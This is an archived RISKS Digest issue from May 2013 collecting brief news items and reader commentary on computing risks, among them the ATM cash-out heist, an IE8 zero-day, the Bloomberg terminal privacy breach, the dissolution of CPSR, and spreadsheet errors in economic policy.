Home page logo
/

risks logo RISKS Forum mailing list archives

Risks Digest 27.28
From: RISKS List Owner <risko () csl sri com>
Date: Fri, 17 May 2013 14:43:03 PDT

RISKS-LIST: Risks-Forum Digest  Friday 17 May 2013  Volume 27 : Issue 28

ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy

***** See last item for further information, disclaimers, caveats, etc. *****
This issue is archived at <http://www.risks.org> as
  <http://catless.ncl.ac.uk/Risks/27.28.html>
The current issue can be found at
  <http://www.csl.sri.com/users/risko/risks.txt>

  Contents:
In Malaysia, online election battles take a nasty turn (Lauren Weinstein)
Pilots communicate with ATC with text messages (Diomidis Spinellis)
Flight cancelations: risk of a required printout (Jared Gottlieb)
CPSR dissolution; Gary Chapman gets CPSR's Norbert Wiener Award
  (Doug Schuler)
Cyberattacks Against U.S. Corporations Are on the Rise (NYTimes)
In Hours, Thieves Took $45 Million in ATM Scheme (Marc Santoram)
Theft of an iPhone Sets Off a Cinematic High-Speed Chase (Michael Wilson
   via Monty Solomon)
"Android threats growing in number and complexity, report says"
  (Lucian Constantin)
Privacy Breach on Bloomberg's Data Terminals (Chozick/Protess via
  Gene Wirchenko)
"Microsoft Warns of Facebook Hijack via Browser Plugin" (Chris Paoli)
"Microsoft admits zero-day bug in IE8, pledges patch" (Gregg Keizer via
  Gene Wirchenko)
Schnucks supermarkets credit card data hacked & exposed (Paul Robinson)
Man Messages Entire Internet (Chris J Brady)
Woman uses Facebook to `stalk' herself and try frame ex-boyfriend
  (Lauren Weinstein)
Name.com security breach: passwords reset; e-mail, credit info ...
  (Lauren Weinstein)
How unique are you? (Martyn Thomas)
More info about that recent bank/ATM international scam (Danny Burstein)
"Exploiting a Bug in Google's Glass" (Gene Wirchenko)
Google Glass Picks Up Early Signal: Keep Out (David Streitfeld via
  Monty Solomon)
Re: Economic policy decisions may be affected by spreadsheet errors
  (Don Hacherl, Dennis F. Hamilton, Chris Drewe)
Re: McAfee spots Adobe Reader PDF-tracking flaw (Henry Baker)
Re: LAX sign story just gets better and better... (Anthony Thorn,
  Eric Ferguson)
Abridged info on RISKS (comp.risks)

----------------------------------------------------------------------

Date: Sat, 4 May 2013 19:22:52 -0700
From: Lauren Weinstein <lauren () vortex com>
Subject: In Malaysia, online election battles take a nasty turn

  Ahead of Malaysia's elections on Sunday, independent online media say
  they are being targeted in Internet attacks which filter content and
  throttle access to websites, threatening to deprive voters of their main
  source of independent reporting.  http://j.mp/17EJvfJ (Reuters via NNSquad)

------------------------------

Date: Thu, 16 May 2013 17:56:10 +0300
From: Diomidis Spinellis <dds () aueb gr>
Subject: Pilots communicate with ATC with text messages

The *World Street Journal* (16 May 2013) ran an article on systems that
allow pilots and air traffic controllers to communicate via text messages
[1].  The article claims that the system can increase the communication's
accuracy and the ATC's productivity.  It also has a pilot lauding the
system's accuracy and speed.

All these benefits sound probable.  However, the risks of the new technology
seem to get a short shrift.  I was struck by the following phrase:
"Controllers have pop-up windows with various choices of standard messages
for altitude changes, frequency changes and some re-routings."  What could
possibly go wrong?

[1]
http://online.wsj.com/article/SB10001424127887324767004578485061565368992.html?mod=e2tw

Diomidis Spinellis - http://www.spinellis.gr

------------------------------

Date: Wed, 8 May 2013 16:55:28 -0600
From: jared gottlieb <JARED () netspace net au>
Subject: Flight cancelations: risk of a required printout

Aviation Week & Space Technology reports that an American Airlines official
attributed a facet of the problem in the 16 April 2013 flight cancellations
as an inability to print out flight plans

The airline's internal Flight Operations System (FOS) in Dallas crashed on
Tuesday afternoon, stranding the airline's entire domestic and international
route structure, estimated to last until 5 p.m. central time.

At issue in part is the inability for pilots to print out their flight
plans, a legacy process that requires a dot-matrix printer and 19 ft. of
paper at the gate for each flight.

 (http://www.aviationweek.com/Article.aspx?id=/article-xml/awx_04_16_2013_p0-569921.xml)

------------------------------

Date: May 7, 2013 9:49:57 PM EDT
From: Doug Schuler <douglas () publicsphereproject org>
Subject: CPSR dissolution; Gary Chapman gets CPSR's Norbert Wiener Award

  [We infrequently run an obit notice, but I don't recall ever running one
  for an organization.  However, if organizations are people, then this does
  not really set a new precedent.  Incidentally, CPSR was mention twice in
  the very first issue of RISKS in 1985, and Gary Chapman contributed to
  RISKS-1.37 and 1.46, as then director of CPSR.  Created by Severo
  Ornstein, and subsequently led by Gary and Marc Rotenberg, CPSR was a
  major player in activities related to RISKS, as Doug notes here.
  Posthumously giving the final Norbert Wiener Award to Gary is very
  fitting.  I hope the CPSR website can survive (cpsr.org) as an
  historically relevant site.  PGN]

It is my unenviable task to announce that Computer Professionals for Social
Responsibility (CPSR), a non-profit educational corporation, has been
dissolved.

CPSR was launched in 1981 in Palo Alto, California, to question the
computerization of war in the United States via the Strategic Computing
Initiative to use artificial intelligence in war, and, soon after, the
Strategic Defense Initiative -- `Star Wars'.  Over the years CPSR evolved
into a `big tent' organization that addressed a variety of computer-related
areas including workplace issues, privacy, participatory design, freedom of
information, community networks, and many others.

Now, of course, there are hundreds, if not thousands, of organizations and
movements that are concerned not only about the misuses of ICT by
governments and corporations (and others) but also about trying to develop
approaches that help communities work together to address issues related to
economic and other inequalities and environmental degradation -- as well as
broader issues such as war and peace.

CPSR to me provided a vital link to important ideas and to inspirational
and creative people. These people believed that positive social change was
possible and that the use of ICT could play a significant role. For
example, in 1993, CPSR developed a document designed to help shape the
National Information Infrastructure (NII) program promoted by the
Clinton/Gore administration to help guide the evolution of networked
digital communication. Through a variety of conferences, workshops and
reports, CPSR encouraged conversations about computers and society that
went beyond hyperbole and conventional wisdom.

Although in many ways the issues that CPSR helped publicize have changed
forms they generally still remain. The ethical and other issues surrounding
the computerization of war, for one thing, have not gone away just because
they're not prominent on the public agenda. CPSR's original focus on the
use of artificial intelligence in `battle management', etc. and the
possibility of launch on warning is probably still pertinent. The advent of
ubiquitous and inexpensive drones definitely is.

Apparently, as many people know, the age of the participatory membership
organizations is over -- their numbers are certainly way down -- and we in
CPSR had certainly noticed that trend. I personally suspect that this
development is not necessarily a good thing. I certainly would welcome
another membership organization with CPSR's Big Tent orientation.

On the occasion of CPSR's dissolution we've developed two small projects for
keeping CPSR's spirit alive.

The first is that it would be a good opportunity to catalog the groups and
organizations around the world that would be natural allies to CPSR if it
still existed. We've started this cataloging (see
http://www.publicsphereproject.org/civic_organizations) but presumably have
only captured a small fraction of these organizations. Please open an
account on the Public Sphere Project site and add the information about your
organization.

The second is less concrete but probably no less important. To help the
current and future generation of activists as we envision possible futures
and interventions, we'd like to put these two related questions forward:
What applications of ICT are the most important to human development and
sustainability? And, on the other hand, What are the strongest challenges to
these applications? Please e-mail me your thoughts on this and I will do my
best to compile the thoughts and make them public.

 - - - -

With this note I also want to announce that CPSR's final Norbert Wiener
Award for Social and Professional Responsibility winner is Gary Chapman,
who served as CPSR's first executive director from 1985 to 1992. The award
recognizes outstanding contributions for social responsibility in computing
technology. Named for Norbert Wiener (1894-1964), who, in addition to a
long and active scientific career that brought the word "cybernetics" (and,
hence, cyberspace) into the language, was also a leader in assessing the
social implications of computerization. Writing in Science (1960) Wiener
reminds us that, ``...even when the individual believes that science
contributes to the human ends which he has at heart, his belief needs a
continual scanning and re-evaluation which is only partly possible. For the
individual scientist, even the partial appraisal of the liaison between the
man and the historical process requires an imaginative forward glance at
history which is difficult, exacting, and only limitedly achievable...We
must always exert the full strength of our imagination.''

Gary (who died in 2010), spent nearly three decades working towards peace
and social justice as it related to information technology. As Marc
Rotenberg of the Electronic Privacy and Information Center (EPIC) stated,
Gary ``made many people stop and ask hard questions about technology. Not
just Is it cool?, but Does it make our lives better, or more just?
And does it make our world more secure?''

Gary's technology column, "Digital Nation," was carried in over 200
newspapers and websites. He taught and lectured all over the world, most
recently as a guest faculty member at the University of Porto in Porto,
Portugal. Since his time at CPSR he had been involved in a multitude of
related projects including the International School for Digital
Transformation (ISDT) that he and others at the University of Texas convened
annually in Porto, Portugal.

Gary was on the faculty of the Lyndon B. Johnson School of Public Affairs at
the University of Texas, Austin. On the local level, he also worked to
bridge the digital divide, the gulf between those with access to technology
and those without. In 1995, for example, he worked on the successful grant
application that led to the establishment of Austin Free-Net
(www.austinfree.net), which installed the first public access Internet
stations in Austin, and continues today as a national model for bringing
digital opportunities to low-income and digitally challenged residents. And
in 2010, Gary co-founded Big Gig Austin (www.biggigaustin.org), which
anchored the successful community campaign to bring the Google gigabit fiber
network to Austin.

Gary was a principled and untiring advocate for the use of the Internet a
tool for collaboration and other means to bring people together. Also, as a
former medic with the Army Special Forces, Gary was especially concerned
about the uses of computing in warfare. In his articles in the CPSR
Newsletter, he warned that ``Automating our ignorance of how to cope with
war will produce only more disaster.''  With David Bellin he co-edited
Computers in Battle: Will They Work?, a book on the implications of computer
technology in war, and was involved for many years in a rich collaboration
with the Pugwash-USPID (Unione Scienziati Per Il Disarmo)-ISODARCO
(International School on Disarmament and Research on Conflicts) community in
Italy and elsewhere.

Gary contributed chapters to several books that I was involved with. Most
recently, he contributed The Good Life, one of the patterns
(publicsphereproject.org/patterns/lv) in Liberating Voices, a book that I
wrote (with the help of 85 others). The verbiage from the pattern card
abridged from the full text reminds us of Gary's humane values, and serves
as an important challenge for all of us:

People who hope for a better world feel the need for a shared vision of the
"good life" that is flexible enough for innumerable individual
circumstances but comprehensive enough to unite people in optimistic,
deliberate, progressive social change. This shared vision of The Good Life
should promote and sustain conviviality and solidarity among people, as
well as feelings of individual effectiveness, self-worth and purpose. A
shared vision of The Good Life is always adapting; it encompasses
suffering, loss and conflict as well as pleasures, reverence and common
goals of improvement. An emergent framework for the modern "good life" is
based on some form of humanism, particularly pragmatic or civic humanism,
with room for a spiritual dimension that does not seek domination. Finally,
the environmental crises of the planet require a broad vision of a "good
life" that can harmonize human aspirations with natural limits. All this
needs to be an ongoing and open-ended "conversation," best suited to small
geographic groups that can craft and then live an identity that reflects
their vision of a "good life."

Although this will be CPSR's final Weiner award, the work that Gary and
other activists from CPSR and other organizations helped launch over two
decades ago is now being carried forward by scores of organizations and
thousands of activists all over the world, as digital information and
communication systems have assumed such a central location on the world's
stage.

Several projects including a Festschrift or other book project or event
related to CPSR and social responsibility have been discussed although no
firm plans have been made.

Gary Chapman was patient but persistent in his pursuit of progressive goals
and a better life for all. Sadly, Gary left us before he could see his
vision brought to fruition. He'll be missed but we all must push forward
with his vision.

Douglas Schuler <douglas () publicsphereproject org>

------------------------------

Date: Mon, 13 May 2013 10:05:37 PDT
From: "Peter G. Neumann" <neumann () csl sri com>
Subject: Cyberattacks Against U.S. Corporations Are on the Rise (NYTimes)

David E. Sanger, Nicole Perlroth, and Michael S. Schmidt [PGN-truncated]
http://www.nytimes.com/2013/05/13/us/cyberattacks-on-rise-against-us-corporations.html?pagewanted=1&hpw

A new wave of cyberattacks is striking American corporations, prompting
warnings from federal officials, including a vague one issued last week by
the Department of Homeland Security. This time, officials say, the
attackers' aim is not espionage but sabotage, and the source seems to be
somewhere in the Middle East.
<http://topics.nytimes.com/top/reference/timestopics/organizations/h/homeland_security_department/index.html?inline=nyt-org>.

The targets have primarily been energy companies, and the attacks appeared
to be probes, looking for ways to seize control of their processing systems.
The attacks are continuing, officials said.  But two senior administration
officials said Sunday that they were still not certain exactly where the
attacks were coming from, or whether they were state-sponsored or the work
of hackers or criminals. [...]

------------------------------

Date: Fri, 10 May 2013 01:21:41 -0400
From: Monty Solomon <monty () roscom com>
Subject: In Hours, Thieves Took $45 Million in ATM Scheme (Marc Santoram)

Marc Santoram, 9 May 2013

It was a brazen bank heist, but a 21st-century version in which the
criminals never wore ski masks, threatened a teller or set foot in a vault.
In two precision operations that involved people in more than two dozen
countries acting in close coordination and with surgical precision, thieves
stole $45 million from thousands of ATM's in a matter of hours.

In New York City alone, the thieves responsible for ATM withdrawals struck
2,904 machines over 10 hours starting on Feb. 19, withdrawing $2.4 million.
The operation included sophisticated computer experts operating in the
shadowy world of Internet hacking, manipulating financial information with
the stroke of a few keys, as well as common street criminals, who used that
information to loot the automated teller machines.  The first to be caught
was a street crew operating in New York, their pictures captured as,
prosecutors said, they traveled the city withdrawing money and stuffing
backpacks with cash. ...

http://www.nytimes.com/2013/05/10/nyregion/eight-charged-in-45-million-global-cyber-bank-thefts.html

------------------------------

Date: Mon, 6 May 2013 10:34:43 -0400
From: Monty Solomon <monty () roscom com>
Subject: Theft of an iPhone Sets Off a Cinematic High-Speed Chase
  (Michael Wilson)

Michael Wilson, *The New York Times*, 3 May 2013

The woman was talking on her iPhone, and never saw coming her induction into
a large and growing subset of crime victims. But there it happened shortly
after noon on April 15, on a busy corner of Main Street in Flushing, Queens.
A teenager zipped past, snatching the phone out of her hand and kept
running.

Devices like hers were stolen 16,000 times last year in New York City. But
what happened on this afternoon was anything but commonplace. The closest
comparison that leaps to mind is a classic chase scene from a 1971 thriller.

The teenager, soon out of sight, had every reason to believe his getaway was
whistle clean. The woman, with just as many reasons to believe that was the
last she would see of her phone, flagged a police officer, who put a call
over the radio with a description of the young man wearing a yellow hooded
sweatshirt. Another officer pulled out his own iPhone, and together with the
victim, logged into the Find My iPhone feature, which should work if the
thief had not turned the victim's phone off.

He had not. A telltale dot appeared on the screen of the officer's phone.
The victim's phone was nearby, at 126th Street and Roosevelt Avenue. ...

http://www.nytimes.com/2013/05/04/nyregion/crime-scene-chasing-down-a-gps-blip-to-a-stolen-iphone.html

------------------------------

Date: Fri, 17 May 2013 09:38:50 -0700
From: Gene Wirchenko <genew () telus net>
Subject: "Android threats growing in number and complexity, report says"
  (Lucian Constantin)

Lucian Constantin, InfoWorld Home, 14 May 2013
The Android threat landscape is starting to resemble that of Windows,
according to F-Secure's Mobile Threat Report

https://www.infoworld.com/d/mobile-technology/android-threats-growing-in-number-and-complexity-report-says-218523

------------------------------

Date: Wed, 15 May 2013 09:02:05 -0400
From: Monty Solomon <monty () roscom com>
Subject: Privacy Breach on Bloomberg's Data Terminals (Chozick/Protess)

Amy Chozick and Ben Protess, *The New York Times*, 10 May 2013
Privacy Breach on Bloomberg's Data Terminals

A shudder went through Wall Street on Friday after the revelation that
Bloomberg News reporters had extracted subscribers' private information
through the company's ubiquitous data terminals to break news.

The company confirmed that reporters at Bloomberg News, the journalism arm
of Bloomberg L.P., had for years used the company's terminals to monitor
when subscribers had logged onto the service and to find out what types of
functions, like the news wire, corporate bond trades or an equities index,
they had looked at. Bloomberg terminals, which cost an average of more than
$20,000 a year, are found in nearly every banking and trading company.

Bloomberg said the functions that allowed journalists to monitor subscribers
were a mistake and were promptly disabled after Goldman Sachs complained
that a Bloomberg reporter had, while inquiring about a partner's employment
status, pointed out that the partner had not logged onto his Bloomberg
terminal lately.

The incident led to broader concerns about the line at Bloomberg between its
lucrative terminal business and the hypercompetitive newsroom, threatening
to undermine the credibility of both. In a secretive world that thrives on
opacity, traders and financial firms jealously guard every speck of
information about their activity to avoid tipping their hand on their trades
and investments. ...

http://www.nytimes.com/2013/05/11/business/media/privacy-breach-on-bloombergs-data-terminals.html

------------------------------

Date: Wed, 15 May 2013 12:38:24 -0700
From: Gene Wirchenko <genew () telus net>
Subject: "Microsoft Warns of Facebook Hijack via Browser Plugin" (Chris Paoli)

Chris Paoli, Redmond Magazine, 14 May 2013
http://redmondmag.com/articles/2013/05/14/microsoft-warns-of-facebook-hijack.aspx

------------------------------

Date: Tue, 07 May 2013 11:56:23 -0700
From: Gene Wirchenko <genew () telus net>
Subject: "Microsoft admits zero-day bug in IE8, pledges patch" (Gregg Keizer)

Gregg Keizer, Computerworld, InfoWorld, 06 May 2013

Security experts suspect Chinese hackers are using the flaw to target
nuclear weapons researchers using IE8, the most widely used of Microsoft's
five supported browsers
http://www.infoworld.com/d/security/microsoft-admits-zero-day-bug-in-ie8-pledges-patch-217927

------------------------------

Date: Thu, 9 May 2013 09:35:56 -0700 (PDT)
From: Paul Robinson <paul () paul-robinson us>
Subject: Schnucks supermarkets credit card data hacked & exposed

Computerworld - For a few months earlier this year, the personal data of
customers of the Schnucks supermarket chain was exposed to hackers whose
work went undetected until after a card processing company issued an alert
about fraudulent activity on a handful of credit and debit cards used at the
stores.
http://www.computerworld.com/s/article/9238891
/Security_tools_can_t_keep_hackers_at_bay?source=IDGENTERPRISENLE_nlt_insider_2013-05-09

  [More like 'Schmucks']

------------------------------

Date: Sun, 5 May 2013 04:14:18 -0700 (PDT)
From: Chris J Brady <chrisjbrady () yahoo com>
Subject: Man Messages Entire Internet

http://metro.co.uk/2013/05/03/man-messages-the-entire-internet-the-internet-replies-i-am-easy-to-exploit-3710848/

Man messages the entire Internet.  The Internet replies: I am easy to
exploit.  Most of the world spent the past year just drifting through life,
he took that time to message every Internet-connected device on the planet.
In order to carry out a survey that would examine the flaws which make us
vulnerable to cyber attacks, Moore messaged almost 4billion Internet
Protocol (IP) addresses belonging to our devices, getting replies from 310m
of them.  The goal was to collate a mountain of data and then go through it
to determine what security flaws exist which leave individuals and
businesses exposed to online criminals.  According to the study, attackers
could potentially access company servers to gain individuals' personal
details. Other vulnerabilities could allow criminals to gain control of
certain infrastructure, from traffic lights to factories to oil pipelines.
``Off-hand, at least 100m devices are directly connected to the Internet and
expose a common security weakness.  The surprising part wasn't the type of
systems exposed, but the sheer number of them and the concentration of
vulnerable systems by geography and industry.''

------------------------------

Date: Sat, 4 May 2013 21:00:09 -0700
From: Lauren Weinstein <lauren () vortex com>
Subject: Woman uses Facebook to `stalk' herself and try frame ex-boyfriend

  "A Comstock Park woman faces criminal charges after police say she
  admitted to creating false Facebook accounts with her ex-boyfriend's
  personal information to make it appear that his new girlfriend was
  threatening her."  http://j.mp/103pqNG (MLive via NNSquad)

------------------------------

Date: Wed, 8 May 2013 16:31:26 -0700
From: Lauren Weinstein <lauren () vortex com>
Subject: Name.com security breach: passwords reset; e-mail, credit info ...

  Internet registrar Name.com on Wednesday revealed it was hit by a security
  breach. The company sent an e-mail to its customers informing them that
  their usernames, e-mail addresses, passwords, and credit card account
  information "may have been accessed by unauthorized individuals."  The
  good news is that the last two were encrypted, according to Name.com's
  e-mail.  http://j.mp/11kBuxI  (TNW)

------------------------------

Date: Tue, 07 May 2013 14:58:13 +0100
From: Martyn Thomas <martyn () thomas-associates co uk>
Subject: How unique are you?

Many of the volunteers in the personal genome project also volunteered their
5-digit zip codes, gender and date of birth, which made it easy to
re-identify them. The data privacy lab has set up a web page
http://aboutmyinfo.org/ so that US residents can see how many other people
have the same details as their own.

------------------------------

Date: Fri, 10 May 2013 17:53:23 -0400 (EDT)
From: danny burstein <dannyb () panix com>
Subject: More info about that recent bank/ATM international scam

[DOJ press release]

" These defendants allegedly formed the New York-based cell of an
international cybercrime organization that used sophisticated intrusion
techniques to hack into the systems of global financial institutions, steal
prepaid debit card data, and eliminate withdrawal limits. " ....  "The
"Unlimited Operation" begins when the cybercrime organization hacks into the
computer systems of a credit card processor, compromises prepaid debit card
accounts, and essentially eliminates the withdrawal limits and account
balances of those accounts. The elimination of withdrawal limits enables the
participants to withdraw literally unlimited amounts of cash until the
operation is shut down.

rest:
http://www.justice.gov/usao/nye/pr/2013/2013may09.html

------------------------------

Date: Mon, 06 May 2013 10:46:12 -0700
From: Gene Wirchenko <genew () telus net>
Subject: "Exploiting a Bug in Google's Glass"

  [Google Glass has been hacked.]

http://www.saurik.com/id/16
Exploiting a Bug in Google's Glass

------------------------------

Date: Tue, 7 May 2013 06:48:37 -0400
From: Monty Solomon <monty () roscom com>
Subject: Google Glass Picks Up Early Signal: Keep Out (David Streitfeld)

David Streitfeld, *The New York Times*, May 6, 2013

SAN FRANCISCO - Google's wearable computer, the most anticipated piece of
electronic wizardry since the iPad and iPhone, will not go on sale for many
months.  But the resistance is already under way.

The glasseslike device, which allows users to access the Internet, take
photos and film short snippets, has been preemptively banned by a Seattle
bar. Large parts of Las Vegas will not welcome wearers.  West Virginia
legislators tried to make it illegal to use the gadget, known as Google
Glass, while driving. ...

http://www.nytimes.com/2013/05/07/technology/personaltech/google-glass-picks-up-early-signal-keep-out.html

------------------------------

Date: Mon, 6 May 2013 09:13:51 -0700
From: "Don Hacherl" <don () hacherl org>
Subject: Re: Economic policy decisions may be affected by spreadsheet errors
  (Shapir, RISKS-27.27)

In RISKS-27.26 and 27.27, Amos Shapir states that Microsoft's failure to
provide symbolic naming in Excel is the root cause of Reinhart and Rogoff's
errors ("I'm not surprised that Microsoft would force such antediluvian
practices upon all of us", "Leaving Excel in this primitive state is
certainly MS's fault."), as well as a host of other evils.  However, this
accusation is clearly erroneous, as Excel supports "named references" and
"named ranges", and has done so for at least a decade (I don't have Excel
documentation handy for versions prior to 2003).

Perhaps the RISK here is the temptation to blame familiar bogeymen for what
you assume their shortcomings must be without bothering to check whether or
not those shortcomings exist.

  [Also noted by James Geissman.  PGN]

------------------------------

Date: Sun, 5 May 2013 08:22:57 -0700
From: "Dennis E. Hamilton" <dennis.hamilton () acm org>
Subject: Re: Economic policy decisions may be affected by spreadsheet errors
  (Shapir and Kohne, RISKS-27.27)

"Define Name"

The mouse-over explanation is,

"Name cells so that you can refer to them in formulas by that name.
...
"Names can be used in formulas to make them easier to understand."

That the binding is to a specific cell is also significant (and can be fixed
or floating to follow the cell when its coordinates change as the result of
other actions).  I don't have any older version of Excel installed at the
moment, but I would be surprised if this feature does not exist in the
still-popular Excel 2003.

It seems that, in this case, Kohne's observations about folks lacking a
combination of subject-matter expertise and fluency with chosen digital
tools is more compelling than dwelling on the absence of features that are
actually present.

I have no recipe for increasing the empowerment of individuals to master
their handy tools.  It is at least as challenging as encouraging safe
password practices and explaining two-factor authentication to those who
thinks multiplicity of the same factor accomplishes anything.  [I deal
reluctantly with an institution that requires me to choose a safe *user* ID
(8-to-16 mixed character types) and obscures the entry field of my own ID,
while only providing a numeric passcode of not more than 8 digits [;<).]

PS: I just looked at a handy guide, "Microsoft Office Professional 2013
Plain & Simple" an overview of the current version that is probably most
useful for those with some fluency with earlier versions.  I see in Chapter
13, Analyzing Your Excel 2013 Data, that the "Define Name" feature is
clearly visible in the illustrative screen captures. The author provides
some nice tips.  Naming cells is not one of them.

PPS: In an alternative, open-source spreadsheet implementation, I found
similar capability after working down the Insert | Names ... | Define menu
selection, reaching a dialog titled "Define Name" with brief description
"Define the name and range or formula expression."

------------------------------

Date: Sat, 11 May 2013 17:46:09 +0100
From: "Chris D." <e767pmk () yahoo co uk>
Subject: Re: Economic policy decisions may be affected by spreadsheet errors
  (RISKS-27.26)

This seems to be rather hard on Microsoft; if you just want to store and
manipulate alphanumeric data, then Excel is widely available and easy to
use.  In my very limited experience, with purpose-made database programs you
have to design the whole 'table' structure first, whereas with Excel you can
just enter data as you go along.  And as mentioned, Excel comes with the
Office package that everyone has, while Access, say, is a separate paid-for
program that you need a business case for, or at least it was where I
worked.  (The problem in RISKS 24.20 was Excel silently changing the format
of data already entered.)

------------------------------

Date: Sun, 05 May 2013 04:16:13 -0700
From: Henry Baker <hbaker1 () pipeline com>
Subject: Re: McAfee spots Adobe Reader PDF-tracking flaw (Wirchenko)

"McAfee suggests that Adobe Reader users disable JavaScript until a patch is
released."

The best advice: "Disable JavaScript in Adobe Reader _forever_", or better
still, find a pdf reader that doesn't even bother implementing JavaScript at
all.

------------------------------

Date: Sun, 05 May 2013 10:09:41 +0200
From: Anthony Thorn <anthony.thorn () atss ch>
Subject: Re: LAX sign story just gets better and better... (RISKS-27.27)

I think the WORST aspect may be:

"Castles said there were no reports of passengers evacuating the terminal ... "
"She said airport officials are looking into ways to ensure a similar
problem does not occur again."

Which problem?   The false alarm, or the fact that nobody took any notice?

------------------------------

Date: Sun, 05 May 2013 22:44:28 +0200
From: "Eric Ferguson" <e.ferguson () antenna nl>
Subject: Re: LAX sign story just gets better and better... (RISKS-27.27)

The biggest issue "that should not occur again" is clearly that no
passengers reacted to the message for 10 minutes. So if there is a real
emergency, the on-screen messages are just about useless.

What happens if this is "fixed" by adding automated pre-recorded loudspeaker
messages telling everyone to evacuate? Then people WILL leave. So then one
slip of the finger on the keyboard can cause major disruption.

Some hard thinking is needed on the whole issue of design and operation of
such automated public alarm systems.  There are also non- negligible issues
of liability in case of "false positives" and "false negatives".

Dr. Eric T. Ferguson, Consultant for Energy and Development,
van Reenenweg 3, 3702 SB  ZEIST  Netherlands  tel: +31 30-2673638

------------------------------

Date: Sun, 7 Oct 2012 20:20:16 -0900
From: RISKS-request () csl sri com
Subject: Abridged info on RISKS (comp.risks)

 The ACM RISKS Forum is a MODERATED digest. Its Usenet manifestation is
 comp.risks, the feed for which is donated by panix.com as of June 2011.
=> SUBSCRIPTIONS: PLEASE read RISKS as a newsgroup (comp.risks or equivalent)
 if possible and convenient for you.  The mailman Web interface can
 be used directly to subscribe and unsubscribe:
   http://lists.csl.sri.com/mailman/listinfo/risks
 Alternatively, to subscribe or unsubscribe via e-mail to mailman
 your FROM: address, send a message to
   risks-request () csl sri com
 containing only the one-word text subscribe or unsubscribe.  You may
 also specify a different receiving address: subscribe address= ... .
 You may short-circuit that process by sending directly to either
   risks-subscribe () csl sri com or risks-unsubscribe () csl sri com
 depending on which action is to be taken.

 Subscription and unsubscription requests require that you reply to a
 confirmation message sent to the subscribing mail address.  Instructions
 are included in the confirmation message.  Each issue of RISKS that you
 receive contains information on how to post, unsubscribe, etc.

=> The complete INFO file (submissions, default disclaimers, archive sites,
 copyright policy, etc.) is online.
   <http://www.CSL.sri.com/risksinfo.html>
 *** Contributors are assumed to have read the full info file for guidelines.

=> .UK users may contact <Lindsay.Marshall () newcastle ac uk>.
=> SPAM challenge-responses will not be honored.  Instead, use an alternative
 address from which you NEVER send mail!
=> SUBMISSIONS: to risks () CSL sri com with meaningful SUBJECT: line.
 *** NOTE: Including the string "notsp" at the beginning or end of the subject
 *** line will be very helpful in separating real contributions from spam.
 *** This attention-string may change, so watch this space now and then.
=> ARCHIVES: ftp://ftp.sri.com/risks for current volume
     or ftp://ftp.sri.com/VL/risks for previous VoLume
 http://www.risks.org takes you to Lindsay Marshall's searchable archive at
 newcastle: http://catless.ncl.ac.uk/Risks/VL.IS.html gets you VoLume, ISsue.
   Lindsay has also added to the Newcastle catless site a palmtop version
   of the most recent RISKS issue and a WAP version that works for many but
   not all telephones: http://catless.ncl.ac.uk/w/r
 <http://the.wiretapped.net/security/info/textfiles/risks-digest/> .
==> PGN's comprehensive historical Illustrative Risks summary of one liners:
    <http://www.csl.sri.com/illustrative.html> for browsing,
    <http://www.csl.sri.com/illustrative.pdf> or .ps for printing
  is no longer maintained up-to-date except for recent election problems.
 *** NOTE: If a cited URL fails, we do not try to update them.  Try
  browsing on the keywords in the subject line or cited article leads.
==> Special Offer to Join ACM for readers of the ACM RISKS Forum:
=    <http://www.acm.org/joinacm1>

------------------------------

End of RISKS-FORUM Digest 27.28
************************


  By Date           By Thread  

Current thread:
  • Risks Digest 27.28 RISKS List Owner (May 17)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault